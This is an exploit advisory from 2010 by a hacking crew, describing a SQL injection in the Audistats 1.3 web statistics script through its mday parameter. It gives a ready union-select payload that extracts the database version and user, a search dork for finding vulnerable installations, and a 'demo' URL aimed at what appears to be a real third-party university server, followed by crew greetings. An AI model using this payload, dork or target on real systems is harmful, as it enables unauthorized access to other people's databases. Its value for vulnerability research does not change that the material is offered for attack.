###################################################################################
#
[~] Audistats SQL injection vulnerability - (mday) #
[~] Author : kaMtiEz (kamzcrew@yahoo.com) #
[~] Homepage : http://www.indonesiancoder.com #
[~] Date : January 29, 2010 #
#
###################################################################################
[ Software Information ]
[+] Vendor : http://adubus.free.fr/audistat/
[+] Download : http://adubus.free.fr/audistat/
[+] version : 1.3 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : -
[+] Location : INDONESIA - JOGJA
##################################################################################
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/?year=kaMtiEz&month=tukulesto&mday=[INDONESIANCODER]
[ Exploit ]
-666+union+all+select+@@version,user()--
[ Demo ]
http://dirac.phys.ncku.edu.tw/stats/?year=kaMtiEz&month=tukulesto&mday=-15+union+all+select+@@version,user()--
===========================================================================
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13Z
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk,r3m1ck
[ NOTE ]
[+] Belajar Belajar Dan Belajar !!
[+] Jack im commiinnggggggggggggggggggggggggggggggggg .. ^_^
[ QUOTE ]
[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
